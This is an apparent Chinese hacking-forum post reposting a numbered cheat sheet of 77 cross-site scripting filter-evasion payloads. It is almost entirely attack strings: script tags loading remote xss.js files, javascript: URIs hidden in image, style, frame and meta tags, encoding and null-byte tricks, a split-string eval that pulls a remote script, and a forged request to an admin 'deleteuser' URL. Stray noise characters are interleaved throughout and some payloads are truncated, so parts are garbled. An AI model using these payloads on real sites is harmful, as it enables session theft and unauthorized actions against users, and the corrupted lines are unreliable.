貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。0 E$ V4 Z$ T% |. t
1 G$ y8 b' V& r (1)普通的XSS JavaScript注入
" S& r: R9 N$ T <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5 V& E3 c" n" F" G( G" j z# d+ L8 }2 i, h8 \
(2)IMG标签XSS使用JavaScript命令: e, ], {- B3 B7 o
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& I' [- j8 }3 G% c9 L9 ^( i
& r- ?3 G b* `0 @( t; P (3)IMG标签无分号无引号' k# F# A* l- W3 i" d# i+ w' u
<IMG SRC=javascript:alert(‘XSS’)>/ m0 ?7 g. L ]# _5 r
7 k% X; v1 N- ^7 c2 `$ |
(4)IMG标签大小写不敏感) P1 R! f2 b, u# N: O. Y
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
' L3 d% p: d. c4 y" l3 m' s) x5 z+ |* v" H& J
(5)HTML编码(必须有分号)
8 [0 m v5 d' y. Y$ ] <IMG SRC=javascript:alert(“XSS”)>1 m$ `* t* k0 m* F+ s1 F
5 u4 W7 u9 J- i! l (6)修正缺陷IMG标签& _8 V: C/ `. n* Y: N
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
4 b: u" M9 O2 s6 S d+ ]- N8 O" C0 }6 e' ^4 n* R
(7)formCharCode标签(计算器)
8 g( `' E1 p: `- q x, i } <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>8 V. [: \: v3 m' D9 W& m4 N& ]
/ V% a. d) x4 C
(8)UTF-8的Unicode编码(计算器)
( a9 h7 d: `: u0 L <IMG SRC=jav..省略..S')>% r% q9 c; i1 H# Q E! h1 V$ m
5 x3 t% z' [/ n7 v" O (9)7位的UTF-8的Unicode编码是没有分号的(计算器)/ e6 L& L. U; f7 z0 o1 Q
<IMG SRC=jav..省略..S')>
! ~# r, A$ }2 ~9 t" W5 }" K8 g; u- Q6 H+ j3 d! w
(10)十六进制编码也是没有分号(计算器)
+ w; K2 A: l$ a( u( v0 v8 c1 t <IMG SRC=java..省略..XSS')>5 ^( u% q8 O n, M" F
% A1 R( W& E! C; ^3 X
(11)嵌入式标签,将Javascript分开
# X% j. ?; I/ l n <IMG SRC=”jav ascript:alert(‘XSS’);”>7 K8 F: B5 x. a1 V8 C! f
! {* D. _2 f* F! P6 e* z (12)嵌入式编码标签,将Javascript分开
9 q- j& h) p% z$ _8 S" h <IMG SRC=”jav ascript:alert(‘XSS’);”>
1 f3 i7 f' h7 u6 Z' F2 Q. m
& M* x N; h" X (13)嵌入式换行符) E1 Y# m) N/ Q8 S: Q- ]$ z1 U" o
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& b' Q8 ~* T# G5 r
, J2 | ?3 ^" I; _ (14)嵌入式回车
- d$ D* O, f$ Q9 J( | <IMG SRC=”jav ascript:alert(‘XSS’);”>
c8 }7 o: u- J& y) J6 D7 F+ t* z
% U r& E9 g1 p! C- p7 g7 [( _ (15)嵌入式多行注入JavaScript,这是XSS极端的例子
* Y6 }2 @% F/ E9 K4 r- r I <IMG SRC=”javascript:alert(‘XSS‘)”>
9 L3 b) g x4 k0 t( ]; p
1 K8 y: n6 m& _2 B% ?1 ` (16)解决限制字符(要求同页面)
B: N5 I: k% y j <script>z=’document.’</script>" U: ]- e3 w* T# t$ R
<script>z=z+’write(“‘</script>0 u( d0 e3 x( j$ ?
<script>z=z+’<script’</script>+ h6 o9 Y0 o+ A ~/ O( f
<script>z=z+’ src=ht’</script>
9 B! H8 e: t t8 Y7 T7 ~# h <script>z=z+’tp://ww’</script>6 o5 D0 S% [% k8 r4 z
<script>z=z+’w.shell’</script>% h: K. g4 l% c! r: @- J
<script>z=z+’.net/1.’</script>8 @4 ^% ?- M+ E% n
<script>z=z+’js></sc’</script># X5 F+ H4 a2 o8 n
<script>z=z+’ript>”)’</script>
9 j1 O4 X2 M! O4 j0 M! l* C" J <script>eval_r(z)</script>8 K r! G, _1 D; Y) f: n0 r, C3 {
8 J6 D* P+ ?" Y (17)空字符
' s& t( L3 H5 U0 T perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
& [+ T4 x; i% V- u$ |4 X; v9 d( h9 e/ j9 E0 S& U* B
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用9 v: }6 B3 Q/ j5 V# l
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out( ]% }0 ]- d6 @2 J
( d& W1 g5 I6 v; W2 ?- [& z- M
(19)Spaces和meta前的IMG标签
) u# n* P; d9 J/ k3 c <IMG SRC=” � javascript:alert(‘XSS’);”>
4 i8 W3 `. | G# E: C$ l8 ~
5 m) z- W( U& A& Q (20)Non-alpha-non-digit XSS
* i# |' K) t, \2 f! y <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>1 R% d4 f: O4 |' W
0 _. _9 t: [, ^% C4 s
(21)Non-alpha-non-digit XSS to 2& ]3 U k8 t) _( i+ ^1 C E
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>' w5 r& p0 k6 V' M z; B* r* p, J
4 y. E9 @: r* M, V
(22)Non-alpha-non-digit XSS to 3/ W' K9 e' ^" r: A/ Z$ N' o
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>/ w" B! f( ]' ~2 z
4 |3 r' v# h0 O R& i
(23)双开括号5 d% K) ] ^; d% q% V8 m% U8 s
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
2 ~( y$ K/ E; D( l+ g/ X- M- F/ f& O- Y! @
(24)无结束脚本标记(仅火狐等浏览器); k! V' {; Y0 K" I
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
. J7 A+ ^$ T2 M5 E. s* e2 E" ]# R$ o1 v. k. i7 ~/ ^# ` U' a
(25)无结束脚本标记29 q5 Q) x! J/ I% l% K
<SCRIPT SRC=//3w.org/XSS/xss.js>
7 M- h# V; D9 j
8 n. Q9 q) s( J C7 o d+ } (26)半开的HTML/JavaScript XSS
+ m1 j& v, }2 {+ {; f <IMG SRC=”javascript:alert(‘XSS’)”
4 B5 |# w6 s! n! A- D- N6 b6 H0 S9 h) K# R
(27)双开角括号
7 b+ s0 j0 X. ?: j <iframe src=http://3w.org/XSS.html <
2 m% j, @2 { `6 a' f
! ?, S1 F: P1 W# | (28)无单引号 双引号 分号
- z* q1 h2 t2 C. M- w9 _" j+ W$ t <SCRIPT>a=/XSS/3 y }+ [ |' G
alert(a.source)</SCRIPT>0 e. i. O; ]& C8 o/ G5 K0 D# q! x
1 G& @. m; F7 D8 m (29)换码过滤的JavaScript
/ c2 p$ p6 Z3 n% T% M9 M \”;alert(‘XSS’);//
( ^# g5 P+ Y# m7 r, ~/ K$ s" \) [/ g( d5 t
(30)结束Title标签/ T, H# h6 M; N' X$ ]
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>0 u4 P/ x' h) l4 S' A
5 G' C- D# c" u9 n% G7 Q5 w# R! |
(31)Input Image" f( W0 ` Y0 ?2 `$ E% C7 d
<INPUT SRC=”javascript:alert(‘XSS’);”>2 K! f3 b: |. W
' o0 _% y/ P1 v! V0 i5 S1 p (32)BODY Image
9 G1 v `4 {& V. [ U <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
L/ M- a7 V# Y% V& {% v! f
7 F( n# j( u: J- s3 g+ M9 a/ u6 w6 w (33)BODY标签
4 k- {( u; [- |- f <BODY(‘XSS’)>
" b( V$ w0 C) @2 E" D6 ~' |
0 E3 H! |: D3 Z- H8 P6 L0 X% V (34)IMG Dynsrc; D8 c2 k2 F7 G1 v
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
1 `3 [# r) O- L3 a9 P& E( ]* E
: [! C% L( v' g! N# @2 D (35)IMG Lowsrc
0 O# ? j1 t" E1 t% g) m5 L <IMG LOWSRC=”javascript:alert(‘XSS’)”>
0 c: ~) Y9 {5 C4 \- y1 m, w* V$ C7 L& w7 B6 r. g" v9 o- ~; K
(36)BGSOUND
) K% X9 q6 a5 z+ _3 ~+ j <BGSOUND SRC=”javascript:alert(‘XSS’);”>5 m7 D# X& r& [
3 {# t' I. b7 e' H: H (37)STYLE sheet( g) m: L6 p6 r0 C% v- F1 O. s
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
$ N+ w/ X- s. w1 E J. O; D/ K5 R4 T1 v) k* c) O- T4 A
(38)远程样式表( S8 M, H# z. c$ Q2 S
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”> a& R$ u& h% I4 Z" a
% Y I' h+ b/ K9 X (39)List-style-image(列表式)
4 l! `: u& d* F% [- O, F <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
/ F& G4 L; ^- H3 C, N) j2 \! n K. V: C
(40)IMG VBscript
5 E( s* ]! ^: v3 m. F) l" K% \3 \* A <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS2 Q4 d' o q) b6 H0 u
, }$ `! n& l% ~ (41)META链接url7 R. |+ R& k/ v, {$ u
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
- _7 b ^3 U7 a) C7 U, W6 y3 o5 s
2 M6 D, X3 x/ ]8 w (42)Iframe
0 J% L& V+ ^5 V1 k) v' A# { <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> T' ]- {& w" u% ^ d
2 Y. \/ T5 O/ d8 U (43)Frame
/ t! w1 @. S7 X <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>7 r" y6 |' F4 [# G" j& L
% V3 q" F: O3 W; C2 O/ @" g
(44)Table
" |1 V- C; C$ x <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
& I# N: D* d, s9 V8 v6 K- ^
9 H! F4 E: v8 Q" V* N0 a+ T5 A3 { (45)TD5 D- D" B0 H1 i* F
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
* t1 ]. B3 d7 i& O# V2 u
1 n1 I. f% n: a2 i, T @ (46)DIV background-image
& Y( [# L6 w* v2 w. l <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
5 ~" r# o) |/ V% A* D. ~* E8 W* } A/ y( Z) B! p
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
7 v2 c7 D, B, R, E7 O' S <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>, o3 k U6 k- E0 X
0 `0 u; r: {) G) K% u. ^1 J6 i# t (48)DIV expression4 d! W& |: d3 ^
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
: W& F" i7 n0 x# e, P7 m. }/ M: T3 P, Z& P3 `
(49)STYLE属性分拆表达
. b0 }! m9 w3 k# k <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>& X% f4 y+ D$ ^5 e$ S
# P5 U( n. f5 I (50)匿名STYLE(组成:开角号和一个字母开头)
' a7 l L' M) l+ T$ \6 _/ r- r <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>5 _) b1 B0 S. l5 }8 i7 f
# y. t! t8 Q* _/ O( W; M7 C
(51)STYLE background-image
) o8 J* a: S7 j( q" y0 C <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>* ]3 Q; y2 F- J6 `4 x! g
+ g8 [# I* s" I( U/ u, Q
(52)IMG STYLE方式
9 p) e0 T" [; n/ q& }- i9 Y exppression(alert(“XSS”))’>
- ?$ [- w, @/ \; Q( \' P6 m, j/ s5 W1 u/ s9 H0 m- B2 D
(53)STYLE background
$ \4 p5 o4 Z, A <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>; x6 T" a5 @4 R- k1 n: G8 @
( P/ S! w D! J+ U" `! \- K4 S (54)BASE9 y/ R8 D: P9 Q7 R7 B- J
<BASE HREF=”javascript:alert(‘XSS’);//”>& E( C- o, G+ n- Q" \0 d/ h: ?0 |
% f; |4 a) p5 p, P% I
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS" a* }4 L7 Q. V
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
! L' Q U" _2 O" y Q, J' `
# u S& E6 `( P! p7 d4 r (56)在flash中使用ActionScrpt可以混进你XSS的代码0 P$ R) S& A' D, Y$ C4 l$ \
a=”get”;- X% Z. V" G% }0 P1 \" j# l6 l
b=”URL(\”";% D& P2 M9 {0 u9 ~
c=”javascript:”;
4 H& n# Q( ^) T. V' B d=”alert(‘XSS’);\”)”;
8 m: [6 V0 D2 e1 h" J eval_r(a+b+c+d);7 {. i! ^& w v) e2 [) W# p
0 D5 A3 _# f8 ]- N( D
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
3 L/ d6 Q6 z5 r& B1 N0 D <HTML xmlns:xss>
3 Q: f% l: s5 v <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
# k e/ n: A; \ <xss:xss>XSS</xss:xss>
# ]5 h: {; p6 l: m- S7 ]/ ? </HTML>
2 R6 C7 `1 C/ w& h) \) ~& ~
/ W+ E2 f6 u5 [- S4 }1 ~# { (58)如果过滤了你的JS你可以在图片里添加JS代码来利用% x) }' B+ A( M" u0 \0 z
<SCRIPT SRC=””></SCRIPT>
. E/ _; W% D/ r, U- |4 m: C# ]; G5 ]: _- j
(59)IMG嵌入式命令,可执行任意命令5 _1 M: G8 @% ?; o: e! w
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# m8 Z" g9 j& A
$ y) d! O% U: P V8 N6 ] (60)IMG嵌入式命令(a.jpg在同服务器)
, d" x1 W4 Y6 Y: N/ p# \ Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
/ K2 V3 ^: B9 M8 f, p* T% u$ o9 R$ l
+ f3 x% Q0 U' d3 R: x% l0 R3 v d (61)绕符号过滤0 J0 C5 \ q8 M* X! M5 o+ J. ]
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>$ E1 i. J' R$ {; q1 x1 D* i
# ~( x8 \! \- J' X: Y ] (62)
! ^1 a( {% f* t3 b0 m4 @ <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>4 g( l1 p0 Q6 S1 i- l
y- p0 L4 t: S6 @5 p7 `& n, N (63)
( j2 r+ t$ B- o3 G0 |, t* w# |5 h <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>' w+ }" D2 L e7 w9 @
/ C- V4 S# e* T. n$ }+ z (64)
% } C' D, c1 [- V8 w# ? <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>( N# S& O* k# G1 g
" q* D$ G% x1 t* o5 S5 q (65)
' f' `0 c7 D: N' R' o. v* `+ q- q p. j <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>' [' ^2 ]6 E/ p/ V9 @7 V
4 M$ Y% [7 P+ N) P (66)
" f6 F; q* x- m. ]( @ <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>; r8 U0 [& N4 K' D% e# H* s) ^) N
) ^/ {2 o- L: G( |- R W6 e8 Z (67)
5 J# G; \. b3 ?, ^2 h8 @# d <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
2 N/ G0 R" N+ O g& j0 h5 v0 t$ ?! _
(68)URL绕行: \0 N9 L0 J- @/ @) `/ e
<A HREF=”http://127.0.0.1/”>XSS</A>
. {% V2 ]9 Q. I2 S% F& t. \5 J2 c. w
/ c" {% Q/ c! r3 ~1 H (69)URL编码. G0 K8 H7 N+ ]/ f% m
<A HREF=”http://3w.org”>XSS</A>
, }6 k) y6 l2 h0 A
) H+ a7 i0 }' o& E& h$ \' ~* D (70)IP十进制( ^" S+ O! E9 b# \2 i
<A HREF=”http://3232235521″>XSS</A>: I( |, H4 C) i3 T/ V3 K2 O
/ ~1 K( F3 H" N" l5 L (71)IP十六进制
1 F! R- C* I! e <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>+ N2 `( [* d3 N1 q2 A! H3 p
% i% z( S$ w$ r% v) G (72)IP八进制
" }" d# x' \3 f2 z$ L% { <A HREF=”http://0300.0250.0000.0001″>XSS</A>& u! |1 }" B* m1 f7 x
: k' R- J# w9 E( f
(73)混合编码
: |4 }( s$ @) Z* J <A HREF=”h$ r+ N' \4 @, o0 h) K% A) ^
tt p://6 6.000146.0×7.147/”">XSS</A>9 M# J9 D" j+ b
, n% L# `' @' Z& G/ S7 z$ M* {
(74)节省[http:]
4 d8 y/ d1 s. i4 n <A HREF=”//www.google.com/”>XSS</A># o1 u9 ]5 X* O* i% r! [% K
+ K$ J3 L% d/ Q9 k, G
(75)节省[www]+ p5 M; z6 F- y1 f2 U/ w
<A HREF=”http://google.com/”>XSS</A>9 ?- Q4 y. ~. H2 ?
# v r9 X) o/ C
(76)绝对点绝对DNS
( q& G1 z5 `: }; _% W% \& }1 M6 t <A HREF=”http://www.google.com./”>XSS</A>
$ \3 Q" h6 x% Y+ Q, H
6 M" Z1 K8 C+ d3 A3 T (77)javascript链接
8 h! d* G/ @& g: C5 x# |( Y7 o6 q' ] <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对